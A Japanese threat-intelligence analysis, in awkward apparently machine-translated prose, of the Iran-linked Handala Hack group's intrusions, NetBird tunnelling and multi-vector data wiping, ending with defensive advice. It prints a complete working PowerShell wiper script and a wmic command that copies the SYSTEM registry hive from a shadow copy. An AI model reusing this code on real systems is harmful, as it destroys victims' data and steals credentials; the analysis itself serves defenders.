「Handala Hack」と指定されたイラン系シンジケート—Void Mantcoreクラスタとイラン情報安全保障省(MOIS)と不可分に絡み合った集団—は、継続して、一見簡潔ではあるが極めて殺傷的な動作パターンで活動している:確実な侵入、ネットワーク周辺への迅速な確立、インフラの手動による走査、そして複数のデータ破壊ベクトルの同時実行である。新たな法医学的解剖により、捜査官らはシンジケートの従来のレパートリーだけでなく、いくつかの新しい特異性を明らかにした。特に注目すべきは、侵害された領域内で秘密のトンネルを構築するためのNetBirdの武器化、および人工知能による調整の明確な痕跡を備えたPowerShellドライバーワイパーである。
「Handala Hack」という呼称は、単一の一時的なキャンペーンを示すものではなく、むしろVoid Mantcoreの公開版の一つとして機能している。この上位の構造は、補助的で十分に文書化された複数の人格—特に「Karma」と「Homeland Justice」—を保持している。アルバニアに対する運動作戦で激しく利用されたのはHomeland Justiceであり、国家権力と電気通信セクターを絶えず標的にしてきた。一方、Handalaは歴史的にはイスラエル企業に対する攻撃と同義であったが、その地理的活動範囲はレバントに限定されなくなった。法医学的アナリストらは、医療技術大手のStrykerを含む米国企業への侵入を明確に文書化している。
資料によると、グループの戦術、技術、および手順(TTP)は2024年から2026年を通じて顕著に静的のままである。Void Mantcoreは侵略されたネットワーク内での手動ナビゲーションを堅固に支持し、商用で一般的なユーティリティ、既製ワイパー、公開されているデータ抹消ツール、および暗号化ロックと地下サービスを活用して初期侵入を確保し、悪意あるインストルメンテーションを調達している。ここでの主要な微妙さは別の場所にある:極めてエキゾチックな戦術がなくても、シンジケートは破局的な破壊効果を達成する。この成功は、急速な作戦の俊敏性、特権認証情報の容赦ない悪用、そして同時の複数ベクトル攻撃から生まれている。
捜査官らは、Handala、Karma、およびHomeland Justiceの人格間の深い相互関係を仮説立てている。これらの異なる前線に帰属する事件は、同様の戦術的操作と、各々のワイパー内のソースコードの共有する連続セグメントを示した。さらに、KarmaとHomeland Justiceは、補助的なイラン系クラスタ「Scarred Manticore」との協力的相乗効果を実証した。特定のシナリオでは、作戦状況は非常に明らかであった:悪行者によって刻まれた内部通信とデジタル落書きはKarmaを明確に指していたが、外流したテレメトリーは最終的にHandalaの名義で拡散された。著者らは、KarmaとHandalaが元々、単一の構造内の二重で自律的なスコードロンまたは二分化した部門として機能し、その後、Handalaのより顕著なブランドの下に統合された可能性があると仮説立てている。この理論は、Karmaの公開劇場からの消失とHandalaの最近の作戦への絶対的支配によって側面的に裏付けられている。
(初心者から最高情報セキュリティ責任者まで:不可欠な重要シンポジウムの概要。あなたの昇進を開始してください。)
オープンソースインテリジェンスは、Void Mantcoreの運動的活動と、歴史的にMOIS内部安全保障局—特にSeyed Yahya Hosseini Panjaki が指揮するテロ対策先端部隊に帰属する作戦との深い交差点を明かしている。法医学的専門家らは、Panjaki が、オープンソースの報道によれば、2026年初期のイスラエルの運動的な対イラン攻撃の初期段階で死亡したことに注目している。この啓示はイランの戦術解剖に直接的に変わりをもたらさないが、より広いイラン地政学的劇場内のクラスタを深く状況化する。
著者の観察に基づくHandalaの初期侵入は、しばしば第三者の請負業者、ITシンジケート、およびサービスプロバイダーの周りに構築されている。戦略的論理は優雅に単純である:単一の仲介者は、複数の主権国家ネットワークを同時に侵害するための導管として機能する。シンジケートは長期的に認証情報、特に侵害されたVPN認証を武器化する貪欲な欲求を示してきた。最近数ヶ月で、捜査官らはHandalaの作戦構造に確定的に結合されたエンタープライズVPNインフラに対する数百の認証努力とパスワードブルートフォース キャンペーンを検出した。そのような接続は頻繁に商用VPNノードから発生し、一方、ソーステレメトリーはDESKTOP-XXXXXXまたはWIN-XXXXXXのようなデフォルトのWindowsホスト名を常に裏切った。
1月のイランインターネット遮断に続いて、作戦状況は微妙に変異した。捜査官らはStarlink に帰属するIP座標から発生する同様の運動的活動を検出し、このパターンが頑固に持続していることに注目した。同時に、シンジケートは作戦規律の急速な低下に苦しんだ。オペレータが以前は商用VPNの背後に彼らのトラフィックを隠し、その真の起源を曖昧にするために努力していたが、その後のエピソードは主権イラン IP座標から発生する直接的な接続を裏切った。歴史的に、イスラエルの標的に対する攻撃を調整する際、グループはカスタマリーに169.150.227.Xサブネットを通じて出たが、時折、この暗号のマスカレードは破裂し、イランのドメインまたはバーチャルプライベートサーバー(VPS)からの接続を露出させた。捜査官らは、軍事的敵対行為の爆発に続いて、彼らの先行する難読化の基準を維持することが極めて困難になったと推測している。隔離された事件で、悪行者らはイスラエルノード146.185.219[.]235を通じた出口に成功し、著者らは同様にVPNサービスに結合されたと評価したが、彼らの歴史的インフラストラクチャから逸脱した。
明確に文書化されたシナリオは、ネットワーク侵入—推定では後続の消滅フェーズ中に武器化された—が運動的な攻撃の数ヶ月前に確保されたケースを詳しく説明している。捜査官らは、この長期の初期アクセスが悪行者に、深く確立し、必要な認証情報を収穫し、極めて重要なことに、Active Directory構造内の「Domain Admin」特権の頂点に上昇する贅沢をもたらしたと仮説立てている。Handalaの破壊的なクレシェンドに先行する苦痛な時間で、アナリストらはシンジケートが体系的に彼らのアクセスの実行性を検証し、盗難された認証情報を用いた認証を厳格にテストしたと評価している。
この事前攻撃の動作パターンの一部は、シンジケートの正統派の特性から微妙に逸脱した。結果として、著者らは慎重に、すべての操作がHandalaに絶対的確実性で一意に帰属できるわけではないと規定する。それにもかかわらず、このシーケンスは攻撃準備に本質的な活動を含んでいた:Windows Defender兵器の独裁的無効化、厳格な内部偵察、認証情報の外流、および107.189.19[.]52に存在する隔離されたコマンドアンドコントロールサーバーから補助ペイロードを取得する努力。
その後、悪行者らは複数のベクトルを通じた認証情報の外流にエスカレートした。資料はrundll32.exeを使用したcomsvcs.dllを経由したLSASSプロセスのダンプを記録している。LSASSは基礎的なWindows体系的プロセスとして動作し、その記憶構造は長期的な横方向の移動に重要な認証情報とインテリジェンスを含んでいる。同時に、襲撃者らはHKLMを含む極めて敏感なレジストリハイブを外流させた。さらに、ADReconはdra.ps1の見せかけでインフラストラクチャ内で点火された。これはActive Directory領域内での偵察のために設計された強力なPowerShellフレームワークを構成している:ユーザー、グループ、信頼構造、計算ホスト、および行政階層に関するインテリジェンスの収穫を可能にしている。捜査官らが推論する正確にこの時点で、悪行者らはおそらくHandalaの消滅作戦で後に武器化されたDomain Admin特権を簒奪した。
資料はまた、ボリュームシャドウコピーからテレメトリーを複製するために活用されたキャプチャされたコマンドフラグメントを照らしている:
wmic.exe /node:[REDACTED_HOSTNAME] /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system c:\users\public"
最高のアクセスと特権を確保すると、シンジケートはネットワークを横方向に移動するのに転換した。ここで、捜査官によると、Handalaは主に手動調整を通じた操作を継続している。異なるシステムを走査するための主要な導管はリモートデスクトッププロトコル(RDP)である。このユビキタスなプロトコルを通じて、オペレータは侵害されたホストにシームレスに認証し、正統派管理者の無差別性で環境をナビゲートする。しかし、重要なマシンが外部から直接アクセス不可能であることが判明した場合、より興味深い楽器が配備された:NetBirdである。
NetBirdは、ゼロトラスト paradigmに基づいた安全で秘密のメッシュネットワークを構築するための正当な建築プラットフォームとして動作している。簡潔に述べられた、それは異なるマシンを結合することを促進し、その共聖は暗号的に保護されたトンネルを走査し、それらを正統派の直接的なネットワーク可視性から完全に独立させるものである。敵対者にとって、これは優雅なユーティリティを提示している:単一のホストが敗北した場合、この楽器は周辺深部内で主権的で秘密のネットワークを織り、補助ノードへの無制約のアクセスを与えるために武器化される可能性がある。記録されたインシデントでは、NetBirdは手動でインストールされた。オペレータはRDP経由で侵害されたシステムに認証し、ネイティブブラウザーを起動し、公式NetBirdリポジトリから直接クライアントをダウンロードした。複数の内部ホスト全体へのインストール後、彼らは強力な内部接続層を確保し、恐ろしい俊敏性で操作する権限を付与した。1つの特定のインシデントで、捜査官らは、完全に敵対者に征服された、環境内で同期的に操作する、最低5つの異なるマシンを観察した。
破壊的なクレシェンドは恐ろしい野蛮さで現れた。絶対的で最大限の破壊を与えるために、シンジケートは4つの異なるワイピング技術を並列で同時に配備した。この冗長性は単なる美的優雅さのために調整されなかった。1つの方法論が機能しなかったか、部分的な禁止に直面した場合、補助ベクトルは容赦なくデータ消滅を維持するだろう。これらの多様なワイパーをネットワーク全体に拡散するために、悪行者らはActive Directory内のグループポリシーを武器化した。これはコーポレートWindowsシアター内の極めて強力な楽器を構成している:幅広いマシンの大多数に中央で瞬時にスクリプトと指令を配布する容量を与える。
最初のコンポーネントは調査官によって「Handala Wiper」と命名された。特定の事例では、実行可能ファイルはhandala.exeに偽装した。このワイパーはスケジュールされたタスクを通じて伝播され、グループポリシーに組み込まれたロジオンスクリプトを通じて生まれた。handala.batスクリプトは2つのコンポーネントを点火した:実行可能ファイルとPowerShellスクリプト。捜査官は明確に魅力的なアーキテクチャ微妙さを強調している:実行可能ファイル自体はドメインコントローラーから遠くで直接起動され、侵害されたマシンのディスク上に物理的な銘記を厳密に避けた。この洗練された人工物は事後検出と法医学的解剖を深く混乱させている。システム内で、有毒なコードはファイルコンテンツを上書きし、マスターブートレコード(MBR)を対象とした消滅技術を武器化した。MBRの破損は単にシステムを完全に動作不可能にするだけでなく、復元の努力を記念碑的に複雑化させる。
末期の段階で、オペレータは最終的で専用のコンポーネントを解き放った:PowerShellワイパーである。それはまたグループポリシーロジオンスクリプトを通じて拡散され、複数のマシンを迅速に飲み込む力を付与した。その作戦論理は野蛮に単純ではあるが、破局的である:スクリプトは再帰的にユーザーディレクトリ内に入れ子になった全ファイルを列挙し、容赦なくそれらを根絶する。捜査官らは、その建築的構造と網羅的な注釈により判定すると、このPowerShellスクリプトは人工知能の援助で著作された可能性が極めて高いと評価している。その最終的な反抗行為で、スクリプトは論理ドライブに画像handala.gifをふりまき、攻撃への消えない視覚的記念碑を残した。
以下は、捜査官資料に組み込まれたPowerShellコードの完全なフラグメントを表している:
$usersFolder = 'C:\Users'
# フォルダが存在することを確認
if (Test-Path $usersFolder) {
# C:\Users内のすべてのアイテムを取得するが、Usersフォルダ自体は除外
$items = Get-ChildItem -Path $usersFolder -Recurse
# C:\Users内の各アイテム(ファイルとサブフォルダ)を削除
foreach ($item in $items) {
try {
Remove-Item -Path $item.FullName -Recurse -Force -ErrorAction Stop
} catch {
Write-Host "削除できませんでした: $($item.FullName)"
}
}
}
$sourceFile = '\\[REDACTED]\SYSVOL\[REDACTED]\scripts\Administtration\install\handala.rar'
$destinationFolder = 'C:\users'
if (!(Test-Path $destinationFolder)) {
New-Item -ItemType Directory -Path $destinationFolder | Out-Null
}
$driveLetter = (Split-Path $destinationFolder -Qualifier).TrimEnd(':','\')
$i = 0
while ((Get-PSDrive $driveLetter).Free -gt (Get-Item $sourceFile).Length) {
Copy-Item $sourceFile "$destinationFolder\Handala_$i.gif"
$i++
}
独自のワイパーを超えて、シンジケートはまた完全に正当なソフトウェア—特にVeraCryptを武器化した。カスタマリーに、VeraCryptはディスクとコンテナの暗号化暗号化のための楽器として崇拝され、データプライバシーを強化するために利用される。Handalaの攻撃では、それは消滅の補助層に変異した。オペレータはRDP経由でホストに認証し、ネイティブブラウザーから公式リポジトリからVeraCryptをダウンロードし、その後システムドライブの暗号化を実行する。被害者にとって、これは極めて苦痛な現実を表している:ワイパーの一部が不完全に機能したか、遮断された場合でも、暗号的に封印されたドライブは完全にアクセスできず、復元の努力を記念碑的に複雑化させる。
特定のシナリオでは、シンジケートは複雑さを完全に回避し、テレメトリーの手動削除に頼った。捜査官らはオペレータがRDP経由でマシンに認証し、手動でファイルを選択し、単に彼らの削除を命じたエピソードを記録した。同様の方式で、彼らは仮想化ハイパーバイザーから仮想マシンを直接根絶した。この戦術は原始的に簡潔に見えるかもしれないが、簒奪された特権と環境への絶対的支配の下で、それは壊滅的に有効であることが証明される。さらに、捜査官らはインシデント自体内だけでなく、Handalaによって公開で拡散されたビデオ記録と外流した資料内でも同様の行動を鮮やかに観察した。
資料の全体的な結論は明確に直接的である。Handala、その結合されたVoid Mantcoreクラスタとともに、その成功を奇想天外で超高度な技術的詐術に述語化しない。その作戦paradigmは基本的ではあるが壊滅的に運動的な操作に固定されている:盗難された認証情報、烈火的なネットワーク侵入、インフラの手動走査、正当なユーティリティを通じた暗号トンネリング、ジャイアント伝播のためのグループポリシーの武器化、および同期的複数のデータ消滅ベクトル。正確にこの理由のため、そのような作戦に対する防御は極めて正統派のままである:基礎アクセスベクトルがどれほど気密に封印されるかが高いほど、ネットワーク内で手動の異常検出がどれほど迅速にトリガーされるかが高いほど、敵対者の破壊的なクレシェンドに到達するのに必要な時間ウィンドウは狭くなる。
防御者への戦略的助言で、捜査官らは最も前向きに、特にリモート侵入と特権アカウントに関しては、多要素認証(MFA)の独裁的実施を助言する。異常な認証テレメトリーに対して深い警戒が向けられなければならない:組織が歴史的に足跡を保持しない主権領土から発生するログイン、極めて異常な時間ウィンドウ中の初期ログイン、成功したログインに達する失敗試行の連鎖的なシーケンス、新しいハードウェアの登録、VPNセッション中の異常な量のデータ外流、および新しい自律システム番号(ASN)またはホスティング供給者を通じた認証。
さらに、著者らは高リスク地理的領土とインフラから発生する進入の遮断を激しく推奨している。資料は明確にイランから発生するインバウンド接続の絶対的なブロード圏と全リモートアクセスサービスを主張し、明確に検証されたビジネス命令を棒引きしている。ホモログの命令はStarlink IP範囲に適用され、捜査官の観察によると、既にイランのオペレータにより武器化されている。絶対的なブロード圏が実行不可能であることが証明された場合、彼らは提案し、最小限に、条件付きアクセスプロトコルの実装、認証前提条件の独裁的強化、およびそのようなネットワーク範囲の専用で粒子的なモニタリング。
補助的で重要な助言ブロックはRDPに関する。彼らはその最大限の制限、厳格な強化、および実質的な作戦上の必要性を欠く場所での絶対的な終了を主張している。DESKTOP-XXXXXXまたはWIN-XXXXXXXXのようなデフォルトのWindows命名法を有するホストから発生するRDP接続を積極的に狩猟することは深く有利であり、特に、そのようなセッションが正統派作戦時間を外で点火する場合。最終的に、潜在的に望まれないプログラム(PUP)のデプロイメント上の警戒サーベイランスは維持されなければならない:リモート管理とモニタリングアーキテクチャ、NetBirdのようなVPN クライアント、および暗号化トンネリングユーティリティ、特にWindows向けSSH。
Handalaの物語は、極めて不安な、しかし重要な真実を鮮やかに図解している:巨大で破局的なインシデントを調整することは、迷路のような、次世代インプラントを普遍的に要求しない。頻繁に、必要な全ては盗難されたVPNアクセス、Domain Admin特権、リモートデスクトッププロトコル、一握りの正当なユーティリティ、およびネットワークを通じて迅速かつ手動で切ることを準備した幹部である。この現実は、高プロファイル地政学的標的だけでなく、リモートアクセスと内部管理に関する基礎衛生が古い仮説に危険に固定されている平凡なエンタープライズにとって、そのような キャンペーンを存在的な脅威にするのはすぐにである。
